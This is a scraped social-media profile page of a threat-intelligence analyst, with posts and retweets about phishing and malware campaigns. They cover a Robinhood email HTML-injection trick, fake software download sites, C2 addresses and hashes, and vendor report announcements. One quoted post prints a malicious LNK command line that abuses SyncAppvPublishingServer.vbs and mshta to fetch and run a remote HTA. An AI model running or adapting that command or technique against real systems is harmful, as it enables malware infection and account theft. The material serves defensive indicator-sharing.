Marc

220 posts

Marc

Marc

@CTI_Marc

Katılım Ekim 2019
270 Takip Edilen465 Takipçiler
Abdel
Abdel@rockkdev·
New Robinhood phishing chain that's kinda beautiful: 1. Attacker creates an RH account using the Gmail dot trick of your email (same inbox, different address) 2. Sets device name to HTML 3. RH's "unrecognized activity" email renders the device name unsanitized (html injection) The result is a real email from noreply@robinhood.com, DKIM pass, SPF pass, DMARC pass, with a phishing CTA Just because it's real, doesn't mean it's safe... $HOOD
Abdel tweet mediaAbdel tweet mediaAbdel tweet media
English
181
367
3.8K
3M
Marc
Marc@CTI_Marc·
@g0njxa did you have a look to powershell (big) script ? Is there a name for this PS malware ?
English
0
0
1
109
Who said what?
Who said what?@g0njxa·
Please note related fake results to this campaign impersonating KeePassXC , Joplin, Cyberduck, WinSCP, Amazon S3 browser, Emeditor and Putty🚨 Domains (5.8.18.129): winscp-download[.]us[.]org winscp-setup[.]net winscp-app[.]org mullvad-vpn[.]us[.]org mullvad-download[.]org mullvad-download[.]it[.]com winscp-downloads[.]com s3-browser[.]quest s3-browser-download[.]blog em-editor[.]co[.]com joplin-download[.]com joplin-desktop[.]app emeditor-download[.]co[.]com cyberduck[.]info cyber-duck[.]co[.]com filezilla-project[.]us[.]com putty-setup[.]us[.]com cyberduck-ftp[.]com cyberduck-download[.]org winscp-ftps[.]com Also observed using another EV cert from malicious signers "Shenzhen Xingzhongxing Electronic Technology Co., Ltd." (Sectigo) KeePass (keepassxc[.]us[.]org) fa68320fd6c7ea9849145066b7b13507cf4186900a218cdc67d387341632d825 b4ad76f7fab47d36f538df5f8f7b5d5f41f15a6c2c3a9c128dd1d49b3d96957c
Who said what? tweet mediaWho said what? tweet media
Who said what?@g0njxa

Watch out for fake @mullvadnet VPN results delivering signed Powershell-loader malware! mullvad-vpn[.]us[.]org >> mullvad-download[.]org Sample: a4b6e81233ca2b8a4c6ace3da6344a7e0a8df92ee06c4763c7b18001c169b133 signed "Xiamen Quanlian Information Technology Co., Ltd." (Sectigo) Detonation: app.any.run/tasks/ebcbc591… This malware executes obfuscated Powershell code from metrics.msft17[.]com/run/XYaR5gFi (Find it here 7b7c3c662d06de7dd0bc41a6fee99cd6d460d204aab7ade67e321bebf04b7447) The malware uses host events[.]ms709[.]com as a botnet C2 with encoded communications

English
2
15
59
14.3K
Raaz
Raaz@solostalking·
WTH is this Phantom RaaS C2 !!!! 83[.136.251.11:34671 94[.237.63.174:36050 94[.237.49.88:36050 Is this someone's project? currently 30 hosts are active, all under UPCLOUD (202053) @500mk500 any idea!
Raaz tweet mediaRaaz tweet mediaRaaz tweet mediaRaaz tweet media
English
3
2
52
3.5K
Marc retweetledi
Sekoia.io
Sekoia.io@sekoia_io·
🇨🇳 We're excited to announce the publication of the latest Sekoia #TDR team report, « A Three Beats Waltz: The ecosystem behind Chinese state-sponsored cyber threats." blog.sekoia.io/a-three-beats-…
Sekoia.io tweet media
English
1
18
36
3.7K
Marc retweetledi
Sekoia.io
Sekoia.io@sekoia_io·
🔍 TDR investigated the emerging #ClickFix social engineering tactic, which several intrusion sets adopted in 2024 to distribute their malware. Our research provides a chronological overview of the observed ClickFix campaigns and their victimology. blog.sekoia.io/clickfix-tacti…
Sekoia.io tweet media
English
1
25
45
8.5K
Marc retweetledi
Sekoia.io
Sekoia.io@sekoia_io·
Since mid-2023, the Sekoia #TDR team has investigated an infrastructure which controls compromised edge devices transformed into Operational Relay Boxes (#ORBs) used to support operations of multiple 🇨🇳 intrusion sets. Check out the full report ⤵️ blog.sekoia.io/bulbature-bene…
Sekoia.io tweet media
English
1
22
31
3.3K
Marc retweetledi
JLexFusion
JLexFusion@jlexfusion·
Happy to announce my new project! 🚀 Do you use Google Meet? Meet TigerTakes on tigertakes.com – your new meeting assistant! 🎯 Connect our bot directly to your Google Meet sessions and get clear, concise summaries in no time. Sign up for free now!
English
0
3
6
167
Marc
Marc@CTI_Marc·
@r3dbU7z Yeah was aware of that but was wondering how threat actor delivers this payload
English
1
0
0
55
̇
̇@r3dbU7z·
System Script Proxy Execution: SyncAppvPublishingServer [ITW] url: .193.124.33.71/ Downloads/ Scan_rekvizity_03.05.2024\.pdf\.lnk [WebDav] e57b2d8b31362ff888fc2f1e58365170 contract_calc\.xls\.lnk b827da23c3485e7f95049596c2e4fab4 Ref[1]:attack.mitre.org/techniques/T12…
̇ tweet mediȧ tweet mediȧ tweet media
English
1
8
15
1.5K
Marc retweetledi
Sekoia.io
Sekoia.io@sekoia_io·
👀 Discover our new report, which provides an in-depth analysis of cyber threats to elections based on past targeted elections. It identifies various types of cyber operations and proposes an assessment of threats regarding the major elections in 2024. blog.sekoia.io/guarding-democ…
Sekoia.io tweet media
English
1
11
22
2.9K
Marc retweetledi
Censys
Censys@censysio·
🔍Discover how to proactively detect malicious activities with Censys data in our next webinar with  @sekoia_io. Explore challenges in monitoring decentralized infrastructures and see MalleableC2 in action📈Book your spot now: go.censys.com/April-Lunch-an…
English
0
7
5
1.2K
Germán Fernández
Germán Fernández@1ZRR4H·
I think this should be part of another campaign (focused on stealing Booking accounts initially), the one I posted is related to a known threat actor, which distributes Malware (via LNK, HTA, ZIP files, etc) using WebDAV servers mainly on LIMENET. Anyway, I guess Booking users have been targeted since the beginning of the brand.
English
1
0
0
301
Germán Fernández
Germán Fernández@1ZRR4H·
Booking[.]com_Confirmation.lnk f20cf00e1b53bb5ba941721c6a0aa77ff12eb64808e7fdfca5263878d6abdcd9 ↓ C:\Windows\System32\SyncAppvPublishingServer.vbs ;.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://galaxe-team[.]info/Downloads/Hotel/Booking.hta "Confirmation.exe" is reported as #AsyncRAT (version: "Venom RAT + HVNC + Stealer + Grabber v6.0.2") C2: 178.33.57.153:4449 [+] Sample: bazaar.abuse.ch/sample/b9371b2…. * Interesting that "Confirmation.exe" is a 7zip SFX (self-extracting) archive that uses AutoIt to achieve the infection 🔎 + WebDAV \\91.92.251.163@80\Downloads\
Germán Fernández tweet mediaGermán Fernández tweet mediaGermán Fernández tweet mediaGermán Fernández tweet media
English
1
27
76
12.8K
Marc retweetledi
Sekoia.io
Sekoia.io@sekoia_io·
🧵 @sekoia_io tracks C2 infrastructures for main #stealer families sold as a Malware-as-a-Service (MaaS). Our view of active C2s, combined with our observations from telemetry, forum monitoring and sample tracking, gives us a global understanding of the stealer threat. ⬇️
Sekoia.io tweet media
English
2
19
56
7.2K
Mario
Mario@0xM4R10·
🚨 SCAM ALERT 🚨 Today I was targeted by the most sophisticated scam I have experienced so far. Luckily, they didn't manage to steal a single cent from me, but I could have lost everything I had and it could easily happen to you. Thread 🧵👇
English
316
902
2.8K
1.2M